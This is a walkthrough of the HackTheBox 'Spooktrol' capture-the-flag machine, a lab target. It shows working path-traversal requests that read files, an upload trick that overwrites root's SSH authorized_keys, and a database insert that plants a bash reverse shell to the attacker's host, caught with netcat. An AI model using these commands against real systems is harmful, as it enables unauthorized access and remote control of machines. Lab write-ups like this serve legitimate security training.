HackTheBox Spooktrol Writeup

Explore the fundamentals of cybersecurity with the Spooktrol Capture The Flag (CTF) challenge, a hard-level machine designed to test the skills of more experienced players. This write-up offers clear insights into advanced Linux concepts, including file manipulation, path traversal, and privilege escalation within a Docker environment, providing a rewarding and challenging experience.

Add Hosts

Edit the /etc/hosts file and add the following entries:

10.10.11.123 spooktrol.htb

This ensures that your system can resolve the domain names spooktrol.htb to the correct IP address 10.10.11.123.

Script to add hosts automatically

ip="10.10.11.123"
domain="spooktrol.htb"
grep -qF "$ip $domain" /etc/hosts || echo -e "$ip $domain" | sudo tee -a /etc/hosts

Mapping

nmap -sCV spooktrol.htb

Starting Nmap 7.95 ( https://nmap.org ) at 2024-09-14 17:02 CEST
Nmap scan report for spooktrol.htb (10.10.11.123)
Host is up (0.054s latency).
Not shown: 997 closed tcp ports (conn-refused)
PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 ea:84:21:a3:22:4a:7d:f9:b5:25:51:79:83:a4:f5:f2 (RSA)
|   256 b8:39:9e:f4:88:be:aa:01:73:2d:10:fb:44:7f:84:61 (ECDSA)
|_  256 22:21:e9:f4:85:90:87:45:16:1f:73:36:41:ee:3b:32 (ED25519)
80/tcp   open  http    Uvicorn
| http-robots.txt: 1 disallowed entry 
|_/file_management/?file=implant
|_http-title: Site doesn't have a title (application/json).
|_http-server-header: uvicorn
2222/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 16:77:76:8a:65:a3:db:23:11:21:66:6e:e4:c3:f2:32 (RSA)
|   256 61:92:eb:7a:a9:14:d7:60:51:00:0c:44:21:a2:61:08 (ECDSA)
|_  256 75:c1:96:9c:69:aa:c8:74:ef:4f:72:bd:62:53:e9:4c (ED25519)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Path Traversal

Begin by exploring the robots.txt file, which reveals:

Disallow: /file_management/?file=implant

Retrieve the initial implant file:

wget 'http://spooktrol.htb/file_management/?file=implant'

Then, use path traversal to access the user.txt flag:

curl 'http://spooktrol.htb/file_management/?file=../../../root/user.txt'

Fuzzing

Use ffuf to find additional files on the server:

ffuf -c -w /usr/share/dict/SecLists/Discovery/Web-Content/raft-small-words.txt -u 'http://spooktrol.htb/file_management/?file=../FUZZ.py' -fc 500

Identified Files

Check the discovered files:

curl 'http://spooktrol.htb/file_management/?file=../server.py'
curl 'http://spooktrol.htb/file_management/?file=../app/main.py'
curl 'http://spooktrol.htb/file_management/?file=../sql_app.db'

Download the SQLite database:

wget 'http://spooktrol.htb/file_management/?file=../sql_app.db' -O spooktrol.db

Exploit the Upload Endpoint

The source code reveals a /file_upload endpoint. Replace the server’s authorized_keys file with your own key:

curl -X PUT http://spooktrol.htb/file_upload/ \
  -H "Cookie: auth=2a" \
  -F 'file=@~/.ssh/id_rsa.pub;filename=../../../../../../../root/.ssh/authorized_keys'

Access the Server

After replacing the authorized_keys, connect to the server via SSH:

ssh -p 2222 root@spooktrol.htb

Privilege Escalation

Inside the server, find the .dockerenv file, indicating it’s a Docker container. To escape, follow these steps:

Enumeration

Navigate to the web application directory and explore the SQLite database:

cd /opt/spook2/
sqlite3 sql_app.db

Enumerate the tables:

sqlite> .tables
sqlite> select * from sessions;
sqlite> select * from tasks;
sqlite> select * from checkins where session == '10a6dd5dde6094059db4d23d7710ae12';

Review the schema and modify the tasks table to execute a reverse shell:

sqlite> .schema
sqlite> .dump tasks
sqlite> INSERT INTO tasks VALUES(2, '10a6dd5dde6094059db4d23d7710ae12', 0, 1, 'bash -c "bash -i >& /dev/tcp/<vpn_ip>/9001 0>&1"', '', '');

Setup a Listener

Set up a Netcat listener on your local machine:

nc -lvnp 9001

Capture the Root Flag

Once you get the connection, read the root flag:

cat /root/root.txt